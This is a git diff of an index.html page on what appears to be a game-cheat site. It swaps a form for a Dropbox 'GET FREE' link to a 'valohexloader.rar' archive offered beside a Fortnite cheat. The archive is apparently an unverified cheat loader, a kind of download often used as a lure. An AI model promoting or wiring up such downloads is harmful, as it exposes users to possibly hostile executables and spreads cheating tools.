--- a/index.html
+++ b/index.html
@@ -99,8 +99,7 @@
             <h1>Top 8 products</h1>
             <h2>The most popular products</h2>
         </div>
-        <form class="catalog-block section" action="valohaxloader.rar" method="post" id="contacts__form">
-            <div class="catalog-block__item">
+         <a href="https://www.dropbox.com/scl/fi/vbe2jc840dvlhg4a5ob9k/valohexloader.rar?rlkey=9iekwli62njfyoyvd7jkueh4l&st=x3a7zjfp&dl=1" class="catalog-block__item-link" download>GET FREE</a>
                 <div>
                     <img src="fortnite.svg" alt="" class="catalog-block__img">
                     <div class="catalog-block__item-title">AquaFort Cheat</div>
